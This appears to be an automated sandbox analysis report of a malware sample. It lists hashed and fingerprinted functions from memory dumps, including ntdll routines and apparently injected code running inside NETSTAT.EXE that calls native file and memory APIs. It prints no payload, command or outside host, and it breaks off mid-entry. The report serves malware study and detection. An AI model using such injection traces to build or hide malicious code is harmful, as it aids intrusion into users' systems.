Opcode ID: b270a9238801003effba3a3ec42bfcd40f2c6005311deedf64845f4667e33a57
Instruction ID: 6acc59803fb438b1d8a8a30e5f497692ab0d3d6e7c87e4b27a94052bdd9c196c
Opcode Fuzzy Hash: b270a9238801003effba3a3ec42bfcd40f2c6005311deedf64845f4667e33a57
Instruction Fuzzy Hash: 7D31E376A00361EBD7109F59C8E0AAA77B6FFC4B10F24465DE911AB340E770AD46CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1E9EF8B0, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA4E51F

Strings

HEAP: , xrefs: 1EA4E49D
(HeapHandle != NULL), xrefs: 1EA4E4A8
HEAP[%wZ]: , xrefs: 1EA4E490

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3610490719
Opcode ID: e672b152b09586591e5660eaa5524e085b9eca4aeaf5347d056d18abeac5eec0
Instruction ID: 30807ad5d154dc69b6a21518c715891d93ebc2227297393776059818da11893d
Opcode Fuzzy Hash: e672b152b09586591e5660eaa5524e085b9eca4aeaf5347d056d18abeac5eec0
Instruction Fuzzy Hash: 8691E975604791AFC317CB24C950B2AB79ABF84600F144B5EFA819FA81DB34EC85CF96

Uniqueness

Uniqueness Score: -1.00%

Function 1EA19723, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA19922

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 1EA5DAFF
Unmapping DLL "%wZ", xrefs: 1EA5DAEE
LdrpUnloadNode, xrefs: 1EA5DAF5

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-2283098728
Opcode ID: 4358922a2668c61be6d06ae23e179259c0bcbd27403af1c70bf2845e627bdff1
Instruction ID: 62c0cc6e3b3398e910bf3adc7ef2c5691eacbbc55ddd8a82f8c9604f3a884fa7
Opcode Fuzzy Hash: 4358922a2668c61be6d06ae23e179259c0bcbd27403af1c70bf2845e627bdff1
Instruction Fuzzy Hash: 2F510335A103429FD714DF38CD80B6A77A6BF88714F180B2DE4529F695E730AC45CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 1EA2C640, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA2C6DF

Strings

minkernel\ntdll\ldrinit.c, xrefs: 1EA680F3
Failed to reallocate the system dirs string !, xrefs: 1EA680E2
LdrpInitializePerUserWindowsDirectory, xrefs: 1EA680E9

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: b8648fac234a31ff2c598abc01a399f26289e2cc08a71d984185a96c0ea02edd
Instruction ID: 0e0ba420e59b19c9d1466a680fc6b3d556e5e7444392789fef761149abbb8d6f
Opcode Fuzzy Hash: b8648fac234a31ff2c598abc01a399f26289e2cc08a71d984185a96c0ea02edd
Instruction Fuzzy Hash: 1D41E4B5510391ABC724DB68DD80B5B77E9AF84750F005FAAF948AB250EB34EC01CB99

Uniqueness

Uniqueness Score: -1.00%

Function 1EA743D5, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA74489

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1EA74508
LdrpCheckRedirection, xrefs: 1EA7450F
minkernel\ntdll\ldrredirect.c, xrefs: 1EA74519

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: 0a807c1bfce1dc989d53771283cc318263d81619c72f718d5f1399da38cb152e
Instruction ID: e2f30f17848e077be4e84c4bdb1b50c072fab23602cc5c18c34ad93932fcf682
Opcode Fuzzy Hash: 0a807c1bfce1dc989d53771283cc318263d81619c72f718d5f1399da38cb152e
Instruction Fuzzy Hash: DA41F332E146219FCB10CF59C940A56B7E7AF88650F060B6DED88EB355D732EC80DB99

Uniqueness

Uniqueness Score: -1.00%

Function 1EA75B90, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA75C0F
RtlDebugPrintTimes.NTDLL ref: 1EA75C31
RtlDebugPrintTimes.NTDLL ref: 1EA75C3E

Strings

Wow64 Emulation Layer, xrefs: 1EA75C09

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: Wow64 Emulation Layer
API String ID: 3446177414-921169906
Opcode ID: 27b60c312d7934ab0b762df0d23ffd8ce09196044395383c305a95c07572f43b
Instruction ID: 0e7c73413c10e5817109900ba7496af81462937e4a12bb0e641f47d7fdf95d95
Opcode Fuzzy Hash: 27b60c312d7934ab0b762df0d23ffd8ce09196044395383c305a95c07572f43b
Instruction Fuzzy Hash: AB212EB590025DBFAB059AA5CE84EFF7F7DEF44299B040658FA01A7100D731EE01DB69

Uniqueness

Uniqueness Score: -1.00%

Function 1EA6EBD0, Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA6EC61
RtlDebugPrintTimes.NTDLL ref: 1EA6EC89
RtlDebugPrintTimes.NTDLL ref: 1EA6ED2C
RtlDebugPrintTimes.NTDLL ref: 1EA6EDE0

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 0624e124d6a7a7c4340a4b1d75eb3d7a8f8f0dbe3bafeffd42c80c22d40c2cd6
Instruction ID: 2f1b4ec35a791c54380208a1086e1ef34206ca72616c9bd0d8d4136da8ee895b
Opcode Fuzzy Hash: 0624e124d6a7a7c4340a4b1d75eb3d7a8f8f0dbe3bafeffd42c80c22d40c2cd6
Instruction Fuzzy Hash: 13712575E00229DFDF04CFA9C984BDDBBB5BF49314F14916AEA05BB244D734AA01CB98

Uniqueness

Uniqueness Score: -1.00%

Function 1EACA04A, Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EACA0F7
RtlDebugPrintTimes.NTDLL ref: 1EACA1AA
RtlDebugPrintTimes.NTDLL ref: 1EACA1CE
RtlDebugPrintTimes.NTDLL ref: 1EACA1E3

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: a2860afcca81daec0ffc3c04db429e4601b7875975c6caea96d35f0f2b84d019
Instruction ID: 4c65b14d41bd8e84e952d6fcf99649886d982f25dae6b63d9976b3375284fa56
Opcode Fuzzy Hash: a2860afcca81daec0ffc3c04db429e4601b7875975c6caea96d35f0f2b84d019
Instruction Fuzzy Hash: 79516B35710A12DFDB08CE19C8B4A29B7E2FB89350B25466DD90BDB724DB71ED41CB88

Uniqueness

Uniqueness Score: -1.00%

Function 1EA6EE56, Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA6EEED
RtlDebugPrintTimes.NTDLL ref: 1EA6EF12
RtlDebugPrintTimes.NTDLL ref: 1EA6EFA4
RtlDebugPrintTimes.NTDLL ref: 1EA6EFF8

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 1e895ab484ebb2f19be71a23d60ea824cfb86a214b47371ed0f7a96b83626c2b
Instruction ID: ac3823031ace5bf41ae9b31dd17e8308863b93f83a7a03371cca65d9ab5817bc
Opcode Fuzzy Hash: 1e895ab484ebb2f19be71a23d60ea824cfb86a214b47371ed0f7a96b83626c2b
Instruction Fuzzy Hash: 8C5145B5E102189FDF08CF9AC844ADDBBF6BF49314F15822AE915BB250E7349A41CF58

Uniqueness

Uniqueness Score: -1.00%

Function 1EA27A4F, Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA27A72
BaseThreadInitThunk.KERNEL32 ref: 1EA27A7C
RtlDebugPrintTimes.NTDLL ref: 1EA647F8
RtlDebugPrintTimes.NTDLL ref: 1EA6487B

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: 6db64be77c2c6baa89e1bb799d0ecd717660a7b70d6ae1b1530a8fc818e57341
Instruction ID: 81aff5bd034c405c078bee165d6bc652650e0f2d4d00d80ef18cdf1738fa2c8c
Opcode Fuzzy Hash: 6db64be77c2c6baa89e1bb799d0ecd717660a7b70d6ae1b1530a8fc818e57341
Instruction Fuzzy Hash: 4F31E475E002689FCB05DFA8D984AAEBBF1BB4C720F14466AE511BB290DB356901CF58

Uniqueness

Uniqueness Score: -1.00%

Function 1E9F58E0, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

@, xrefs: 1EA508AE

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 36372e94b6e8f61053158fccb0c819dd26df4286503022e4d5836da83b7f17cf
Instruction ID: 0d10728260772d43a7caec19baf297e2d20f02a907017f0592b2196e1c8f440d
Opcode Fuzzy Hash: 36372e94b6e8f61053158fccb0c819dd26df4286503022e4d5836da83b7f17cf
Instruction Fuzzy Hash: C9322474D042AADFDB21CF65C984BD9BBB5BF08304F0086E9D449A7281D7B5AE84CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1E9F0485, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E9F05D6

Strings

kLsE, xrefs: 1E9F05FE
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1E9F0586

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: b7d4fa4f549c805eb31974638d793bfcc282056d2296c614b37f0142d4c845aa
Instruction ID: 6b60d138400e0d5c696f3fa32564a35c485b47bbc1e2da4a7ab089836f2ca550
Opcode Fuzzy Hash: b7d4fa4f549c805eb31974638d793bfcc282056d2296c614b37f0142d4c845aa
Instruction Fuzzy Hash: AA51CFB1A10786DFCB14DFA6C4406ABBBFDAF44301F108A3ED59587241E7B4A905CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E9EDF21, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E9EDFE0

Strings

0, xrefs: 1E9EDFAB
0, xrefs: 1E9EDFC0

Memory Dump Source

Source File: 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 00000006.00000002.22829052597.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: b93f66c5ad677032961d8f1613d4fe5357fcc1ade58c2698c9794cf30c9c841d
Instruction ID: 6559ccb392dd24455fead55d0d762e2c2cf76b0a2896e00d4636c4e63023cf62
Opcode Fuzzy Hash: b93f66c5ad677032961d8f1613d4fe5357fcc1ade58c2698c9794cf30c9c841d
Instruction Fuzzy Hash: 5D419FB56187429FC301CF28D544A1ABBE5BB88318F044A6EF588DB700D331EA45CF96

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: NETSTAT.EXE PID: 5904 Parent PID: 4672 NETSTAT.EXECOMMON

Executed Functions

Function 0281A350, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02814BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02814BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0281A39D

Strings

.z`, xrefs: 0281A38D, 0281A398

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 690aa9d83f4a634c945ecc9c30e45a978a67fde2a9ff1529dd7b892dd56c2d21
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: F3F0BDB6201208AFCB08CF88DC84EEB77ADAF8C754F158248BA1D97240C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0281A3FA, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02814D62,5EB65239,FFFFFFFF,02814A21,?,?,02814D62,?,02814A21,FFFFFFFF,5EB65239,02814D62,?,00000000), ref: 0281A445

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d32e0d638b8c9d44667026736cd51673f20e803c7f89a7982dcc69850f3772a5
Instruction ID: a77d849d49fbbea8a9ee67dc0e2350d233241e98486f5a21b311a5dfecd25e62
Opcode Fuzzy Hash: d32e0d638b8c9d44667026736cd51673f20e803c7f89a7982dcc69850f3772a5
Instruction Fuzzy Hash: D5F0F4B6210108AFDB18CF89DC80EEB77ADEF8C354F158249FA1DA7250C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0281A400, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02814D62,5EB65239,FFFFFFFF,02814A21,?,?,02814D62,?,02814A21,FFFFFFFF,5EB65239,02814D62,?,00000000), ref: 0281A445

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 2eee73f8e50baa33e912c65214ef08c4520506f114048112e4ffecf5719f68e8
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 4DF0A4B6200208AFCB18DF89DC80EEB77ADAF8C754F158248BA1D97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0281A52A, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02802D11,00002000,00003000,00000004), ref: 0281A569

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: c00081a187e26aeba5cc82743331d3b344c46f1d4e64b49517a684fbd8893e54
Instruction ID: 48e160b4fd0141dec45e36a3d9c762d1ec7ee2c79b219fb12d680080fde7043d
Opcode Fuzzy Hash: c00081a187e26aeba5cc82743331d3b344c46f1d4e64b49517a684fbd8893e54
Instruction Fuzzy Hash: 1CF0A7B51001495FCB14DF5CDC80CE77769BF48224B14865DF95CD7202C631D811CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0281A530, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02802D11,00002000,00003000,00000004), ref: 0281A569

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 97e41652099475ec67dff49c521f62b1cc7b9ecc99a8ec4b66f8b0fcebd5a25b
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 95F015B6200208AFCB18DF89CC80EAB77ADAF88754F118148BE1D97241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0281A480, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02814D40,?,?,02814D40,00000000,FFFFFFFF), ref: 0281A4A5

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 74a2c4147b61b800fdf10a90b995411afd5a9732511e2d5d1a2a6140b39159c0
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 5ED0177A200214ABD714EB98CC85EA77BADEF48760F154499BA1D9B282C530FA008AE0

Uniqueness

Uniqueness Score: -1.00%

Function 02FF34E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02FF34EA

Memory Dump Source

Source File: 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, Offset: 02F80000, based on PE: true

Associated: 00000008.00000002.26926629640.00000000030A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d50c0d1eaa82d8acb1376bbb5640b4fffcd3c716ba476491b26cb3ca828e9fc4
Instruction ID: 5ad92b242b5eaf3b5bb7c931f4ebe9906ade762af074474349b34f0de376310a
Opcode Fuzzy Hash: d50c0d1eaa82d8acb1376bbb5640b4fffcd3c716ba476491b26cb3ca828e9fc4
Instruction Fuzzy Hash: 1B90023160690803E500A1588654706104597D0301F61C815A041456CDC7A5895176A2

Uniqueness

Uniqueness Score: -1.00%

Function 02FF2A80, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02FF2A8A

Memory Dump Source

Source File: 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, Offset: 02F80000, based on PE: true

Associated: 00000008.00000002.26926629640.00000000030A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 75b0efea7db46169f1f615e4b30c89ca1731e0af14ca87571a060f818f7f300f
Instruction ID: 0b2483b9e6edb3d1a622aaf239b13c3de757bd330d2fade31884cc301c97d559
Opcode Fuzzy Hash: 75b0efea7db46169f1f615e4b30c89ca1731e0af14ca87571a060f818f7f300f
Instruction Fuzzy Hash: 98900261203804039505B1588554616404A97E0301F51C425E1004594DC63588917225

Uniqueness

Uniqueness Score: -1.00%

Function 02FF2BC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02FF2BCA

Memory Dump Source

Source File: 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, Offset: 02F80000, based on PE: true

Associated: 00000008.00000002.26926629640.00000000030A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 28c8d69e0b953bd273b7a69730ffcd1f28b6626a169e3f38317584a8acd635c3
Instruction ID: fd8d7fc2ad112451a09b5d223788630e9f7108120983fdd042a35ca44abb5088
Opcode Fuzzy Hash: 28c8d69e0b953bd273b7a69730ffcd1f28b6626a169e3f38317584a8acd635c3
Instruction Fuzzy Hash: 6190023120280803E500A5989548646004597E0301F51D415A5014559EC77588917231

Uniqueness

Uniqueness Score: -1.00%

Function 02FF2B90, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02FF2B9A

Memory Dump Source

Source File: 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, Offset: 02F80000, based on PE: true

Associated: 00000008.00000002.26926629640.00000000030A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 05c9899944caa028656a910a39b5ffc77c147bbb4c7220bc256a83517baff164
Instruction ID: cf9d47362bc9fa1a680df0057aee0a626716c99148673f1a02dc2e0392834702
Opcode Fuzzy Hash: 05c9899944caa028656a910a39b5ffc77c147bbb4c7220bc256a83517baff164
Instruction Fuzzy Hash: D390023120288C03E510A158C54474A004597D0301F55C815A441465CDC7A588917221

Uniqueness

Uniqueness Score: -1.00%

Function 02FF2B80, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02FF2B8A

Memory Dump Source

Source File: 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, Offset: 02F80000, based on PE: true

Associated: 00000008.00000002.26926629640.00000000030A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e39cac976abaccf369397f019751d921a61bee24cc67bcb2461a6ebfce4004eb
Instruction ID: df9504f65f5ae4019ca126f5b00a57307b7d03ddd2fc6db686a857b487a4be60
Opcode Fuzzy Hash: e39cac976abaccf369397f019751d921a61bee24cc67bcb2461a6ebfce4004eb
Instruction Fuzzy Hash: E990023120280C43E500A1588544B46004597E0301F51C41AA0114658DC725C8517621

Uniqueness

Uniqueness Score: -1.00%

Function 02FF2B10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02FF2B1A

Memory Dump Source

Source File: 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, Offset: 02F80000, based on PE: true

Associated: 00000008.00000002.26926629640.00000000030A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3844fd2e90ac218715e5b5a21ee8f72c593c22f9bce8c4a5a2a23556a1b604be
Instruction ID: d6e98158b8144c0707d98196818fdca2903f13fe707184bbe35e32d28086c4bf
Opcode Fuzzy Hash: 3844fd2e90ac218715e5b5a21ee8f72c593c22f9bce8c4a5a2a23556a1b604be
Instruction Fuzzy Hash: 2E90023120280C03E580B158854464A004597D1301F91C419A0015658DCB258A5977A1

Uniqueness

Uniqueness Score: -1.00%

Function 02FF2B00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02FF2B0A

Memory Dump Source

Source File: 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, Offset: 02F80000, based on PE: true

Associated: 00000008.00000002.26926629640.00000000030A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6cd8dc5a06518a0973ad336d229e90e8dd94f80c0dbad9af5795eb565a0af4ac
Instruction ID: 9990e36d9ee4938eef7b3413d540d5b66af6696d0add78eb27177e10720d22e3
Opcode Fuzzy Hash: 6cd8dc5a06518a0973ad336d229e90e8dd94f80c0dbad9af5795eb565a0af4ac
Instruction Fuzzy Hash: B790023120684C43E540B1588544A46005597D0305F51C415A0054698DD7358D55B761

Uniqueness

Uniqueness Score: -1.00%

Function 02FF29F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02FF29FA

Memory Dump Source

Source File: 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, Offset: 02F80000, based on PE: true

Associated: 00000008.00000002.26926629640.00000000030A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ffe9bf7d7bac52fd9556b480fa0a01f2172c8bd261915a96e522a1a798fd9903
Instruction ID: cc07aa40727c45515debe762ca4a8c1ef870384cf4ff20131a6a3c5197b8961a
Opcode Fuzzy Hash: ffe9bf7d7bac52fd9556b480fa0a01f2172c8bd261915a96e522a1a798fd9903
Instruction Fuzzy Hash: 6E900435313C04035505F55C474450700C7D7D5351751C435F1005554CD731CC717331

Uniqueness

Uniqueness Score: -1.00%

Function 02FF2E50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02FF2E5A

Memory Dump Source

Source File: 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, Offset: 02F80000, based on PE: true

Associated: 00000008.00000002.26926629640.00000000030A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a66fa35b3c76497b441bcc5cebf2e3146f578b463e91b26ceffef1be27566ccf
Instruction ID: 226222620c82d0c674bada1a87ead46549b09d14257b41929ac59b3c1998cbda
